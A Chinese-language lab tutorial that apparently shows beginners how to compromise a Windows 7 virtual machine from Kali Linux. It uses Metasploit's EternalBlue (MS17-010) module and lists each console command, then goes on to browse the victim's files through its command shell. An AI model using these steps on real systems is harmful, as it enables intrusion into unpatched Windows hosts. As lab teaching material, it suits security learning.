一、背景介绍
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
3.1 利用Metasploit(msf)渗透框架对目标主机进行攻击,如下图所示。
步骤1:启动Metasploit(msf)渗透框架,如下图所示。
命令:msfconsole
步骤2:Metasploit(msf)渗透框架启动成功,如下图所示。
步骤3:检索漏洞,如下图所示。
命令:search 漏洞编号
例子:search ms17-010
步骤4:检索到有关漏洞的利用模块如下图所示。
步骤5:选择对应的漏洞利用模块并使用,如下图所示。
命令:use 漏洞利用模块名称
例子:use
exploit/windows/smb/ms17_010_eternalblue
步骤6:查看使用的漏洞模块需要设置的参数,如下图所示。。
命令:show option
步骤7:设置攻击参数,如下图所示。
命令:set rhosts 受害者主机IP
例子:set rhosts 192.168.78.160
步骤8:查看对应的参数是否设置成功,如下图所示。
命令:show options
步骤9:运行漏洞利用模块,如下图所示。
命令:run
步骤10:如下图所示,成功拿下目标主机
提示:ETERNALBLUE overwrite completed successfully!
3.2 进入后渗透阶段,利用DOS命令控制目标主机,如下图所示。
步骤1:进入Windows系统的cmd窗口,如下图所示。
步骤2:利用命令查看受害者主机的文件夹信息,如下图所示。
命令:dir
切换文件夹目录:cd 文件夹名
切换盘符:cd 盘符名